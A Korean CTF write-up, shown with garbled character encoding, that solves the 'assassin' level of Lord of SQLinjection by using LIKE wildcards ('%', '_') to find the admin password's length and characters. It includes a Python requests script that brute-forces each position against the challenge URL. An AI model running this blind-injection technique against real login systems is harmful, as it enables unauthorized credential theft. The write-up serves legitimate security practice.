๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐ŸดCTF/Lord of SQLinjection

Lord of SQLinjection - assassin

by Janger 2021. 12. 8.
728x90
๋ฐ˜์‘ํ˜•

https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php 

 

https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php

 

los.rubiya.kr

 

ํŒจ์Šค์›Œ๋“œ๋ฅผ ์ž…๋ ฅ์„ ๋ฐ›๋Š”๋ฐ '๋ฅผ ๊ธˆ์ง€ํ•˜๊ณ  ์žˆ์–ด์„œ ๋‹ค๋ฅธ ์ฟผ๋ฆฌ๋ฌธ์„ ๋„ฃ๋Š” ๊ฒŒ ํž˜๋“ค๋‹ค. 

๋ฌธ์ œ์—์„œ ์‹คํ–‰๋˜๋Š” ์ฟผ๋ฆฌ๋ฌธ์„ ์ž˜ ์‚ดํŽด๋ณด๋ฉด pw๊ฐ€ =๊ฐ€ ์•„๋‹Œ like๋กœ ์ผ์น˜ํ•˜๋Š” ์กฐ๊ฑด์„ ๊ตฌํ•˜๊ณ  ์žˆ๋‹ค. 

 

 

LIKE๋Š” =์™€ ๋‹ค๋ฅด๊ฒŒ ํŠน์ • ๋ฌธ์ž๊ฐ€ ํฌํ•จ์ด ๋˜์–ด์žˆ์–ด๋„ ์กฐ๊ฑด์„ ์ฐธ์œผ๋กœ ๋งŒ๋“ค ์ˆ˜๊ฐ€ ์žˆ๋‹ค. 

 

์˜ˆ๋ฅผ ๋“ค์–ด A๋กœ ์‹œ์ž‘ํ•˜๋Š” ๋ฌธ์ž๋ฅผ ์ฐพ๊ณ  ์‹ถ๋‹ค๋ฉด A%

A๋กœ ๋๋‚˜๋Š” ๋ฌธ์ž๋ฅผ ์ฐพ๊ณ  ์‹ถ๋‹ค๋ฉด %A

A๊ฐ€ ํฌํ•จํ•˜๋Š” ๋ฌธ์ž๋ฅผ ์ฐพ๊ณ  ์‹ถ๋‹ค๋ฉด %A%

์ด๋Ÿฐ ์‹์œผ๋กœ ๋ง์ด๋‹ค. 

 

 

๋˜ํ•œ _๋ฅผ ์ด์šฉํ•ด ํŒจ์Šค์›Œ๋“œ์˜ ๊ธธ์ด ๋˜ํ•œ ๊ตฌํ•  ์ˆ˜๊ฐ€ ์žˆ๋Š”๋ฐ 

์ฐพ๊ณ ์ž ํ•˜๋Š” ๊ฐ’์˜ ๊ธธ์ด์— ๋งž์ถฐ์„œ _๋ฅผ ์จ์ฃผ๋ฉด ์กฐ๊ฑด์ด ์ฐธ์ด ๋˜๊ฒŒ ๋œ๋‹ค. 

1์—์„œ๋ถ€ํ„ฐ 8๊ฐœ๊นŒ์ง€ ๋„ฃ์–ด์ฃผ๋‹ˆ๊น Hello guest๊ฐ€ ๋‚˜์˜ค๋Š” ๊ฒƒ์„ ๋ณด๋‹ˆ ๋น„๋ฐ€๋ฒˆํ˜ธ๋Š” 8๊ธ€์ž์ด๋‹ค. 

 

 

 

๋‚˜๋Š” ์šฐ์„  ๋น„๋ฐ€๋ฒˆํ˜ธ์˜ ๊ธธ์ด๋ฅผ ์ฐพ๊ธฐ ์ด์ „์— admin์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ์— ํฌํ•จํ•˜๋Š” ๋ฌธ์ž๋ฅผ ๊ฒ€์ƒ‰ํ•ด ๋ณด์•˜๋Š”๋ฐ

์ด๋Ÿฐ ์‹์œผ๋กœ ํŒจ์Šค์›Œ๋“œ์— 9๊ฐ€ ํฌํ•จํ•˜๋Š” ๊ฒƒ์„ ์ฐพ๋Š” ๋ฐฉ๋ฒ•์œผ๋กœ 

ํ•˜์ง€๋งŒ ์•„๋ฌด๋ฆฌ ๋ชจ๋“  ๋ฌธ์ž๋ฅผ ์ž…๋ ฅ์„ ํ•ด์ฃผ์–ด๋„, ํ•ด๋‹นํ•˜๋Š” ์œ ์ €๋ฅผ ์ฐพ์ง€ ๋ชปํ•˜๊ฑฐ๋‚˜ ๋‚˜์™€๋ดค์ž ๋‹ค guest์ผ ๋ฟ์ด์—ˆ๋‹ค. 

 

์ด๋ฅผ ์ถ”์ธกํ•ด ๋ณด๋ฉด admin๊ณผ guest๋Š” ์„œ๋กœ ๋น„๋ฐ€๋ฒˆํ˜ธ์— ๋“ค์–ด๊ฐ€๋Š” ๋ฌธ์ž ์š”์†Œ๋“ค์ด ๋˜‘๊ฐ™๋‹ค๋Š” ๊ฒƒ์ด๋‹ค. ์—ฌ๊ธฐ์„œ ์„œ๋กœ ๋ฌธ์ž์˜ ์œ„์น˜๊ฐ€ ๋‹ค๋ฅด๊ณ  

 

๊ทธ๋ ‡๊ฒŒ ํ•ด์„œ ๊ฐ ๋น„๋ฐ€๋ฒˆํ˜ธ์˜ ๋ฌธ์ž ์œ„์น˜๋งˆ๋‹ค ๋ฌธ์ž๋“ค์„ ๋ชจ๋‘ ๋Œ€์ž…ํ•ด๋ด์„œ guest์™€ admin์„ ๊ตฌ๋ถ„ํ•˜๋„๋ก ํ•ด๋ณด์•˜๋‹ค. 

guest์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋Š” 1234ABCD์ด๊ณ 

admin์˜ ๋น„๋ฐ€๋ฒˆํ˜ธ๋Š” 1234BACD์ผ ๊ฒฝ์šฐ์— ์•ž์— 1234๋Š” ๋™์ผํ•˜์ง€๋งŒ ์ค‘๊ฐ„์— ๋ฌธ์ž๋Š” ๋‹ค๋ฅด๊ธฐ ๋•Œ๋ฌธ์— ๋ถ„๋ช… ๊ตฌ๋ถ„์„ ํ•  ์ˆ˜๊ฐ€ ์žˆ์„ ๊ฒƒ์ด๋‹ค. 

 

 

import requests

parameter = None



cookie = {'PHPSESSID':'์ž์‹ ์˜ ์ฟ ํ‚ค ๊ฐ’์„ ์ž…๋ ฅ'}

result = None

solve = ""
	
for i in range(8):
	

	for ascii in range(48, 112+1):
		print(ascii)
		parameter = "?pw=" + ("_" * i) + "{}%".format(chr(ascii)) + ( "_" * (7 - i) )
		url = "https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php" + parameter
		result = requests.get(url=url, cookies=cookie).text
		print(parameter)
		if "Hello admin" in result:
			print("success!")
			exit(0)

์ด๋ ‡๊ฒŒ ํŒŒ์ด์ฌ์œผ๋กœ ๊ฐ„๋‹จํ•œ ์ž๋™ํ™” ๋„๊ตฌ๋ฅผ ๋งŒ๋“ค์–ด ์ฃผ์—ˆ๋‹ค. 

 

a%_______ ์ด๋Ÿฐ ์‹์œผ๋กœ ๊ฐ ์ž๋ฆฌ์—๋Š” 64๊ฐœ์˜ ๋ฌธ์ž๊ฐ€ ๋“ค์–ด๊ฐ€๊ฒŒ ๋  ๊ฒƒ์ด๊ณ , 

์‹œ๋„๋ฅผ ๋์— ์ฒซ ๋ฒˆ์งธ ์ž๋ฆฌ์—๋„ Hello admin์ด ๋‚˜์˜ค์ง€ ์•Š๋Š”๋‹ค๋ฉด ๋ฐ”๋กœ ๋‹ค์Œ ์—ด๋กœ ์ด๋™ํ•˜๋Š” ๋ฐฉ์‹์ด๋‹ค. 

_%a______

 

์ด 8 * 64(512)๋ฒˆ ์‹œ๋„ํ•˜๊ฒŒ ๋œ๋‹ค.

 

 

728x90
๋ฐ˜์‘ํ˜•

'๐ŸดCTF > Lord of SQLinjection' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Lord of SQLinjection - succubus  (0) 2021.12.08
Lord of SQLinjection - giant  (0) 2021.12.08
Lord of SQLinjection - bugbear  (0) 2021.12.07
Lord of SQLinjection - darkknight  (0) 2021.12.07
Lord of SQLinjection - skeleton  (0) 2021.12.07